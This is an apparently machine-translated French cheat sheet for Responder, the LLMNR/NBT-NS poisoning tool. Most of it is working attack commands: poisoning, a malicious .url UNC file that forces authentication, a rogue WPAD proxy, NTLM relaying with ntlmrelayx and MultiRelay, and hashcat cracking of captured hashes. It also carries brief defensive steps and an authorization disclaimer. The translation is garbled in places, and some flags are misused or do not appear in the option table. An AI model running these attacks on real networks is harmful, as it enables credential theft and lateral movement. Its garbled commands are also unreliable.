Répondeur Feuille de chaleur¶

Copier toutes les commandes Générer PDF

Aperçu général¶

Le répondeur est un puissant empoisonneur LLMNR (Lien-Local Multicast Name Resolution), NBT-NS (NetBIOS Name Service) et MDNS (Multicast DNS). Il est conçu pour répondre à des requêtes de résolution de noms de réseau spécifiques et comprend des serveurs d'authentification rogue HTTP/SMB/MSSQL/FTP/LDAP intégrés supportant l'authentification NTLMv1/NTLMv2/LMv2.

C'est pas vrai. Attention: Responder est un outil de test de sécurité qui ne devrait être utilisé que dans les environnements où vous avez la permission explicite de le faire.

Installation¶

Kali Linux¶

# Update package list
sudo apt update

# Install if not already installed
sudo apt install responder

De GitHub¶

# Clone the repository
git clone https://github.com/lgandx/Responder

# Navigate to the directory
cd Responder

# Make the Python script executable
chmod +x Responder.py
```_

### Utilisation de pip
```bash
# Install using pip
pip install Responder
```_

## Utilisation de base

### Répondre au démarrage
```bash
# Basic usage with interface specification
responder -I eth0

# Start with all options enabled
responder -I eth0 -wrf

# Analyze mode (passive)
responder -I eth0 -A

Options de ligne de commande¶

Option	Description
`-h, --help`	Show help message and exit
`-A, --analyze`	Analyze mode. Do not poison any requests, just analyze traffic
`-I <interface>`	Network interface to use
`-i <IP>`	IP address to bind to
`-e <IP>`	External IP address (for DHCP options)
`-b, --basic`	Return a Basic HTTP authentication. Default: NTLM
`-r, --wredir`	Enable answers for netbios wredir suffix queries
`-d, --NBTNSdomain`	Enable answers for netbios domain suffix queries
`-f, --fingerprint`	Fingerprint hosts that issued an NBT-NS or LLMNR query
`-w, --wpad`	Start the WPAD rogue proxy server
`-u, --upstream-proxy`	Upstream HTTP proxy used by the rogue WPAD proxy
`-F, --ForceWpadAuth`	Force NTLM/Basic authentication on wpad.dat file retrieval
`-P, --ProxyAuth`	Force NTLM/Basic authentication for any proxy request
`-lm, --LM`	Force LM hashing downgrade for Windows XP/2003 and earlier
`-v, --verbose`	Increase verbosity
`--log-local`	Log to file in addition to console
`-s, --disable-syslog`	Do not log to syslog
`-S, --disable-stdout`	Do not log to stdout
`-c, --config`	Path to configuration file
`--server=SERVER`	Enable/disable specific server (HTTP, SMB, etc.)
`--sql`	Enable the MSSQL server
`--mssql`	Enable the MSSQL server
`--https`	Enable the HTTPS server
`--http`	Enable the HTTP server
`--smb`	Enable the SMB server
`--ftp`	Enable the FTP server
`--imap`	Enable the IMAP server
`--pop`	Enable the POP server
`--smtp`	Enable the SMTP server
`--ldap`	Enable the LDAP server
`--dns`	Enable the DNS server

Fichier de configuration¶

Le fichier de configuration est situé à /etc/responder/Responder.conf ou dans le répertoire Responder sous Responder.conf.

Options de configuration clés¶

[Responder Core]
; Set to On or Off to enable or disable features
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On

Scénarios d'attaque¶

Empoisonnement de base LLMNR/NBT-NS¶

# Start Responder with default settings
responder -I eth0 -v

# Wait for authentication attempts
# Hashes will be saved in the logs directory

Authentification forcée via UNC Voie¶

# Create a file with a UNC path
echo "file://<non-existent-share>/test.txt" > malicious.url

# Start Responder
responder -I eth0 -v

# When the victim opens the file, their system will attempt to authenticate
# Responder will capture the hash

WPAD Attaque¶

# Start Responder with WPAD enabled
responder -I eth0 -w -v

# When a victim's browser requests a WPAD configuration file
# Responder will respond and capture authentication attempts

Configuration de l'attaque de relais¶

# Start Responder with SMB and HTTP servers disabled
responder -I eth0 -v --disable-http --disable-smb

# In another terminal, run ntlmrelayx
ntlmrelayx.py -t <target_ip> -smb2support

Capture de hache et cracking¶

Affichage des hashés capturés¶

# View captured hashes
cat /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt

# Format of captured hash
# USERNAME::DOMAIN:challenge:NTLM response:other data

Cracking avec Hashcat¶

# Crack NTLMv2 hashes with hashcat
hashcat -m 5600 /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt /path/to/wordlist

# Crack NTLMv1 hashes with hashcat
hashcat -m 5500 /usr/share/responder/logs/SMB-NTLMv1-SSP-<IP>.txt /path/to/wordlist

Techniques avancées¶

Utilisation de Responder avec MultiRelay¶

# Start Responder with SMB and HTTP servers disabled
responder -I eth0 -v --disable-http --disable-smb

# In another terminal, run MultiRelay
cd Responder/tools
python3 MultiRelay.py -t <target_ip> -u ALL

Hôtes d'empoisonnement spécifiques¶

# Create a file with target IPs
echo "192.168.1.10" > targets.txt

# Start Responder with target file
responder -I eth0 -v -e targets.txt

Valeur du défi personnalisé¶

# Edit Responder.conf and set a custom challenge
# [Responder Core]
# Challenge = 1122334455667788

Mesures défensives¶

Désactivation du LLMNR par la politique de groupe¶

Éditeur de politiques du groupe ouvert
Naviguez vers la configuration informatique > Modèles administratifs > Réseau > DNS Client
Activer "Débrancher la résolution de nom multicast"

Désactiver NBT-NS via la ligne de commande¶

# Disable NBT-NS on Windows
netsh interface ipv4 set interface "Local Area Connection" nbtbios=disabled

Désactiver NBT-NS via le registre¶

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\NodeType = 2 (P-node)

Détecter l'activité du répondant¶

# Monitor for suspicious LLMNR/NBT-NS responses
# Look for multiple services running on the same IP
# Check for unusual authentication attempts

Dépannage¶

Questions communes¶

** Conflits de port** ```bash # Check if ports are already in use netstat -tuln|grep -E '445|80|53'

# Kill conflicting processes sudo kill ```

Interface introuvable ```bash # List available interfaces ip a

# Use the correct interface name responder -I ```

Émissions de permis bash # Run with sudo sudo responder -I eth0
Pas de hashés capturés bash # Check if Responder is running in analyze mode # Ensure the network allows the required traffic # Try forcing authentication with UNC paths

Ressources¶

[Répertoire officiel GitHub] (LINK_3)
[MITRE ATT&CK - LLMNR/NBT-NS Poisonnage] (LINK_3)
[Kali Linux Tools - Répondre] (LINK_3)

*Cette feuille de triche fournit une référence complète pour l'utilisation de Responder dans les scénarios de tests de sécurité. Assurez-vous toujours d'avoir une autorisation appropriée avant d'utiliser cet outil dans n'importe quel environnement. *